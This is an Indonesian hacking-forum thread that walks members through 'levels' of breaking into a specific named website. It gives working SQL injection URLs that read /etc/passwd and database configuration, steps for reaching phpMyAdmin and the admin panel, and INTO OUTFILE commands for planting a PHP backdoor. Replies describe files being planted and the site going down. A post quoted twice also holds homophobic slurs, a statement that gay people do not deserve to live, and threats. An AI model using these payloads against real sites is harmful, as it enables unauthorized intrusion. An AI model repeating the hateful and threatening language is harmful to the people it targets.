gblack's Challenge Level 1 - Hax This Site!

[3xtr3m3b0y]

@Omz gblack:
cmn nambahin doank koq Omz biar ada kelanjutannya:

Level 1 : Take over Site Admin (Udah ada yg ngasih screenshotx)

Code: Select all

http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10--

Langkah sampe mendapatkan lokasi ini bisa liat posting sebelomnya,Bag. Load_File tinggal ganti dengan lokasi ini dlm bentuk HEX:
/web/./ioseaturtles/_include/class.mysql.php

Nnt cari baris konf. koneksi ke database...

phpmyadmin page, bisa ditebak2 dl or scan pke page scanner:
http://ioseaturtles.org/phpmyadmin/

Cari tabel yg berisi user dan pass login yg tepat...

halaman webadmin, bisa nebak2 or scan :
http://ioseaturtles.org/webadmin/

Level 2 : Create PHP File / Backdoor

Code: Select all

Bermodalkan phpmyadmin yg telah diakses, bisa nyoba menggunakan INTO OUTFILE ke lokasi yg pasti dapat di tulisi mis: dir /tmp

Pada phpmyadmin pilih tab SQL, lalu ketikkan kodex, mis :

SELECT '3xtr3m3b0y w45 h3r3' INTO OUTFILE '/tmp/3xtr3m3b0y.php'

Jika tidak ada error kemungkinan berhasil, utk pastinya bisa memanfaatkan LOAD_FILE, ketikkan ini pada jendela SQL :

SELECT load_file('/tmp/3xtr3m3b0y.php')

atau masukkan alamat ini di address Browser :
http://ioseaturtles.org/headline_detail.php?id=-1582+union+all+select+1,2,3,load_file(0x2f746d702f33787472336d336230792e706870),5,6,7,8,9,10--

Jika berhasil seharusnya muncul isi dari file tersebut...

Kendala utama adalah mencari lokasi yg tepat pada web directory, untuk mencari lokasi target bisa menggunakan bantuan page scanner sprt Intellitamper, Acunetix dll, atau bisa jg mencari fasilitas upload file pada Admin Site yg telah diambil alih sebelumnya, lalu mencoba menggunakan lokasi tsb sebagai target penulisan file. Jika muncul pesan Error 13 berarti kita tdk diberi izin write...

Level 3 : Gaining Shell & Rooting
Dinantikan...


Mhn dikoreksi, krn pasti masih banyak kesalahanx, maklum msh CuPu Omz dan Kk skalian... :kaca:

[wiLMaR_kiDz]

+1 Tey

Swt...
Pny gw didelete...
Maksud na apa??
Mengganggu kalian kah??
Ya deh...
Kalian emg ebad!

Source SQLi dumper gw jg diganti gambar org lagi coli... Ini membuktikan klo di antara elu emang pure GAY!! Najoss!! Gay tak pantas hidup!!
Sekarang klo elu emang bisa coding PHP, elu coding trus lu publish, trus gw ganti gambar emak lo gw ntod!! Ga usah malu2 babbi!!

Klo elo ga terima, kontak gw skarang!!

Klo mw ribut ga usah sembunyi2... Banci lo pada!!
Tinggal sebutin nickname / nama aza dah kelar...
Ntar gw samperin klo lo emang sifat na bikin rusuh and berani nanggung!!

Ini buad belajar, bukan bersaing njink!!

Forum Yogyafree Keren Yach!!

Mod & Admin: Jangan delete post gw ini, sbuah wujud protes pada orang yang ga mendukung ilmu pendidikan IT dengan mengganti source SQLi Dumper gw menjadi gambar GAY!!

hmm..slow down om gblack....
i think, this is a good thread.. :kaca:
and i argree to Fight & Fvck'n the FagGottz sh*t idiotta..!!..

sipp..di tnggu for videonya ntar om gbLack......

[al-carati]

Sabar bung Gblack....
Ju2r aje tread ni sangat bagus koq coz nambah ilmu bung :tapa: :tapa: :tapa: lagi

[3xtr3m3b0y]

@Omz wiLMaR_kiDz & al-carati :
Setuju Omz, oya Omz mhn pencerahan buat Level 3 donk Omz...

@Omz gblack:
Tuh Omz dah disupport, dilanjutin lg explorasinya Omz, mhn pencerahannya...!!!

[Bi4kKob4r]

wah... kok punya gw pada ilang sih???
bukannya perasaan udah nanem... :gebrak: :gebrak: :gebrak:

siapa sih yang merasa jago disini... :rokok: :rokok: :rokok:

ini buat pendidikan omz... gw setuju ma omz gblack...
PM gw juga kalo merasa... :circle: :circle:

[tey]

+1 Tey

Swt...
Pny gw didelete...
Maksud na apa??
Mengganggu kalian kah??
Ya deh...
Kalian emg ebad!

Source SQLi dumper gw jg diganti gambar org lagi coli... Ini membuktikan klo di antara elu emang pure GAY!! Najoss!! Gay tak pantas hidup!!
Sekarang klo elu emang bisa coding PHP, elu coding trus lu publish, trus gw ganti gambar emak lo gw ntod!! Ga usah malu2 babbi!!

Klo elo ga terima, kontak gw skarang!!

Klo mw ribut ga usah sembunyi2... Banci lo pada!!
Tinggal sebutin nickname / nama aza dah kelar...
Ntar gw samperin klo lo emang sifat na bikin rusuh and berani nanggung!!

Ini buad belajar, bukan bersaing njink!!

Forum Yogyafree Keren Yach!!

Mod & Admin: Jangan delete post gw ini, sbuah wujud protes pada orang yang ga mendukung ilmu pendidikan IT dengan mengganti source SQLi Dumper gw menjadi gambar GAY!!

wadoh koq bisa y?? aku gak ngikut2 kk huehehehh,,,ak cuman pngen blajar gak berani delete2 file punya orang,,T_T sabar z kk mudh2an tu org dapet pacar seorang GAY..amin :rokok: :kaca: :kaca:

Code: Select all

@Kk Tey:
diperhatikan kode errorx Kk -> Error code 13 -> Permission denied
hrs nyari lokasi yg punya permission write utk user yg kt gunakan skrg

@ 3xtr3m3b0y

iya kk kmaren dh di cobain lagi and sukses thx infonya kk hehehe,, mf bru blajar :circle:

[3xtr3m3b0y]

Wadoh udah ahh omz2 skalian, kembali ke tujuan awal kita, explorasi lebih jauh hingga yang terdalam tapi jangan merusak yah dan klo dah berhasil share ilmunya yakss Omz... :kaca:

[tey]

Wadoh udah ahh omz2 skalian, kembali ke tujuan awal kita, explorasi lebih jauh hingga yang terdalam tapi jangan merusak yah dan klo dah berhasil share ilmunya yakss Omz... :kaca:

hueheheh benr om2 setubuh,, eh setujuh,,mohon bimbingan nya y kk2 sekalian :kaca:

[poni]

waks. webnya skrg malah not responding...... alias dimatiin.. mungkin lagi dipelajari kesalahannya oleh admin na kali. kemungkinan file yang ditanamkan dihapus oleh adminnya. bukan yg ngikut thread ini.

[3xtr3m3b0y]

waks. webnya skrg malah not responding...... alias dimatiin.. mungkin lagi dipelajari kesalahannya oleh admin na kali. kemungkinan file yang ditanamkan dihapus oleh adminnya. bukan yg ngikut thread ini.

Moga aja gtu Omz... :putusasa: